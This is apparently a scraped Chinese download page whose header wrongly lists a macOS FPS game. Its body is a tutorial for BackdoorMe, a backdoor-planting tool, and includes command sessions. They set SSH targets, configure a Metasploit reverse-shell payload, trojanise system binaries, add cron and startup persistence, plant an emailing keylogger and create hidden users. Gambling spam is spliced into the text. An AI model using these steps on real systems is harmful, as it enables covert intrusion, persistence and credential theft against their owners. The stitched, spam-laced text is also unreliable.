大小:830.6M 語言: 簡體中文
類型:FPS 係(xì)統:macOS





BackdoorMe是(shì)一款功能強大的自動化後門工具(jù),用於滲透測試!很明顯,軟件是帶有攻擊性的,嚴禁用於非法用途。該(gāi)工具目前使用(yòng)了metasploit接口,以後會慢(màn)慢淡化接口,增強自(zì)身特色(sè)。需要(yào)的朋友下!
後門程序一(yī)般是指那些繞過安全性控製而獲取(qǔ)對程序或係統訪(fǎng)問權的程(chéng)序方法。在軟件的開發階(jiē)段(duàn),程序員常常會在軟件內創建後門程序以便(biàn)可以修改程序(xù)設計中的缺(quē)陷。但是,如果這些後門被其他人知道,或是在發布軟件之前沒有刪除(chú)後門程序,那麽它就成了安全風險,容易被黑客當成漏(lòu)洞進行攻(gōng)擊。
後門程序又(yòu)稱特洛依木馬,其用途在於潛伏在電腦中,從(cóng)事(shì)搜集信息或便於黑客進入的動作。後門程(chéng)序和電(diàn)腦病毒最大的差別(bié),在於後門程序(xù)不一定有自我複製(zhì)的(de)動作,也就(jiù)是後門程序不一定會“感染”其它電腦。

其(qí)內置了Backdoors(後門)、Modules(模塊)和Auxiliaries(輔助模塊)
Bash
Bash2(依賴更多)
Metasploit
Netcat
Netcat-traditional
Perl
Php(非WEB後門,但使用了WEB模塊)
Pupy
Python
Web(php–WEB後門)
在安裝backdoorme之前(qián),請(qǐng)先確保您準備好了所有的依(yī)賴包。足球大(dà)小球
$pythondependencies.py
啟動backdoorme:
$pythonmaster.py ___ __ __ __ ___ /_)________//_____//__ ___ ____/ |/ /__ /_ /_`/__/ '_/_ /_/_/__//|_//-_) /____/\_,_/\__/_/\_\_,_/\___/\___/_//_/ /_/\__/ WelcometoBackdoorMe,apowerfulbackdooringutility.Type"help"toseethelistofavailablecommands. Type"addtarget"tosetatarget,and"open"toopenanSSHconnectiontothattarget. UsinglocalIPof10.1.0.1. >>
加入target:
>>addtarget TargetHostname:10.1.0.2 Username:victim Password:password123 +Target1Set! >>
Backdoor
請(qǐng)輸入“use”關鍵詞來使(shǐ)用後門(mén):
>>usemetasploit +Usingcurrenttarget1. +UsingMetasploitbackdoor... (msf)>>
從從這兒開始,你可以設置後門相關選項,運行“showoptions”或者“help”,來查看需要配置的(de)參數。這裏設置選項,用(yòng)“set”就行了。
(msf)>>showoptions Backdooroptions: Option Value Description Required ------ ----- ----------- -------- name initd nameofthebackdoor False format elf formattowritethebackdoorto True lhost 10.1.0.1 localIPtoconnectbackto True encoder none encodertouseforthebackdoor False lport 4444 localporttoconnectbackon True payload linux/x86/meterpreter/reverse_tcp payloadtodeployinbackdoor True (msf)>>setnameapache +name=>apache (msf)>>showoptions Backdooroptions: Option Value Description Required ------ ----- ----------- -------- name apache nameofthebackdoor False ...
Modules
每個後門在添加(jiā)了額外的模塊後,會變得更加有效。要添(tiān)加一個模塊,隻需要使用“add”。
(msf)>>addpoison +Poisonmoduleadded
每個模塊都有額外的參數可以定製,如果(guǒ)運行了“help”,你可以看到或者設置任何附加選項。
(msf)>>help ... Poisonmoduleoptions: Option Value Description Required ------ ----- ----------- -------- name ls nameofcommandtopoison False locations/bin wheretoputpoisonedfilesinto False
現在能啟用的模塊包(bāo)括:
Poison:
感染目標計(jì)算機上的(de)可執(zhí)行文件,它會編譯一個exe,把(bǎ)原有的程序變(biàn)為後門。
比如,如果這個模塊感染了“ls”,它會進行編譯,然後(hòu)把正常“ls”給變成後門“ls”,這樣一來用戶可以更頻繁地運行(háng)“ls”後門。
Cron:
作用和做法同上。
Web:
啟動WEB服務,放置存有後(hòu)門的WEB頁麵,訪(fǎng)問該網頁則監聽開始(shǐ)。
Keylogger:
植入鍵盤(pán)記錄器,在配置時可以配(pèi)入點自己郵件,每小時會收到結果。
User:
添加新(xīn)用戶。
Startup:
可(kě)以將後門植入bashrc或者init文件。
Auxiliaries
為了更(gèng)加隱蔽,某些用戶可(kě)能會希望在目標機器上(shàng)使用特(tè)定的服務。應用auxiliary模塊(kuài),使用“apply”即可。
>>applyuser +UserAuxiliaryModuleadded.
Auxiliaries支(zhī)持modules的使用,所有它(tā)們能更加(jiā)隱蔽和頻繁的運行。
>>(user)addstartup +StartupModuleadded.
現有啟用的auxiliaries包括:
User
在目標機器添加新用戶。
Targets
Backdoorme支持(chí)同時操作多個目標,使(shǐ)用數字序號切換即可。比如,使用(yòng)“usemetasploit2”命令,可以在目(mù)標(biāo)“2”上使用msf。
ybo体育官网 24直播体育吧 体育直播亚冠 新加坡博彩公司 电竞博彩合法吗
熱門評論(lùn)
最新評論